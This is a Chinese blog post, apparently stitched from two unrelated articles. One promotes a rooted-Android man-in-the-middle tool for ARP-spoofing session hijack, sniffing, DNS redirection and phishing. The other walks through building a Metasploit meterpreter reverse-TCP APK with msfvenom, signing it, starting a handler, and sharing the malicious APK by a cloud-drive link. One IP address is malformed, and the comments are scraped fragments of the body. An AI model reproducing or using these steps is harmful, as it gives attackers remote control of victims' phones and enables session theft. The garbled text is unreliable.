作者:hacker发布时间:2022-09-09分类:网站破解浏览:178评论:5
笔者实习快四个月了,刚来公司的时候没什么任务,空闲的时候发现了安卓渗透神器dsploit,安装玩了几次。其实以前也听说过中间人攻击,也玩过ettercap,MITMf,metasploit等,但是一直没想过在Android上面实现这些功能,于是乎下载dsploit源码玩了几天。
刚好自己也是做Android相关工作的,所以有了自己写一个的想法,依葫芦画瓢开发了这个工具。
免责声明
本应用开发初衷仅为了学习,未经他人允许,对他人局域网进行的破坏,干扰等行为与本人无关。
功能概述
数据嗅探,可抓去局域网内部主机与外界通信数据
会话劫持,对局域网中的主机通过实施ARP欺骗,进行cookie欺骗,从而达到劫持会话的效果
简单web服务器功能,结合下面功能实施钓鱼欺骗
URL重定向,实现DNS欺骗功能。配合上面web服务器功能,可进行钓鱼欺骗功能待(待完成)
WiFi终结,中断局域网内主机与外界通信(待完成)
代码注入,通过数据截取,对远程主机返回的数据进行篡改,实现代码注入的效果(待完成)
截图预览
安装前提
1、安卓手机2.3及以上,必须root
2、已安装busybox
下载地址
虽然该应用目前功能单一,但是毕竟是自己慢慢写出来的,我还是会继续更新下去的。如果有想法,或者想学习的同学都欢迎和我交流
直接贡献代码
首先,你要知道metasploit俗称msf。你应该先了解一下里面的exp。要知道通过哪个exp可以对安卓系统的入侵。
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
这是我们切换到安卓模拟器。
标签:安卓手机打造成渗透工具
已有5位网友发表了看法:
访客 评论于 2022-09-09 13:20:16 回复
ux和安卓模拟器演示如何使用Metasploit框架控制Android设备。创建负载我们需要两台虚拟机:Kali Linux和安卓模拟器。打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序
访客 评论于 2022-09-09 10:00:42 回复
/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Exploit是时候将恶意的APK发送到手机上。我们这里
访客 评论于 2022-09-09 18:51:52 回复
。打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组
访客 评论于 2022-09-09 10:56:56 回复
了一个带有签名的APK,它可以安装在任何设备上。使用Metasploit进行测试接下来启动metasploit的监听器。执行msfconsole打开控制台。use exploit/mult
访客 评论于 2022-09-09 14:54:52 回复
。我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。我们可以使用如下工具进行手动签名:l Keytool (已安装)l jar signer (已安装)l